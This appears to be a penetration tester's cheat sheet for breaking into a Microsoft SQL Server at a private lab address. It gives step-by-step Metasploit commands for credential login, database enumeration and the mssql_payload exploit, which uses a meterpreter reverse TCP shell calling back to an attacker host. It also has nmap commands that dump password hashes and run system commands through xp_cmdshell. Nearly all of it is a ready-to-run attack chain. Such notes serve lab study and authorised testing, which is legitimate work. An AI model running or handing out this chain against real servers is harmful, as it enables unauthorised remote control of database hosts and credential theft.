SQL

Test credentials:

msf> use auxiliary/scanner/mssql/mssql_login

set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
set verbose true

run // we are looking for it to report success, but this module will never give us a shell

Show DBs and info:

msf> use auxiliary/admin/mssql/mssql_enum

set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
set verbose true

run // keep an eye out for whether we are an admin user and whether cmd or remote access is enabled

msf> use exploit/windows/mssql/mssql_payload

set rhosts 172.16.64.199
set rport 1433
set srvport 53
set username fooadmin
set password fooadmin
set verbose true

set payload windows/x64/meterpreter_reverse_tcp

set lhost 172.16.64.10
set lport 1234

run // wait for the shell to come back, then run 'getuid' to see if it worked.

// shell: msf> shell // this will then spawn our shell on the MSSQL box

#nmap --script-help "ms and sql"

broadcast-ms-sql-discover ms-sql-brute ms-sql-config ms-sql-dac ms-sql-dump-hashes ms-sql-empty-password ms-sql-hasdbaccess ms-sql-info ms-sql-ntlm-info ms-sql-query ms-sql-tables ms-sql-xp-cmdshell

#nmap --script -sV -p 1433

Example: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433
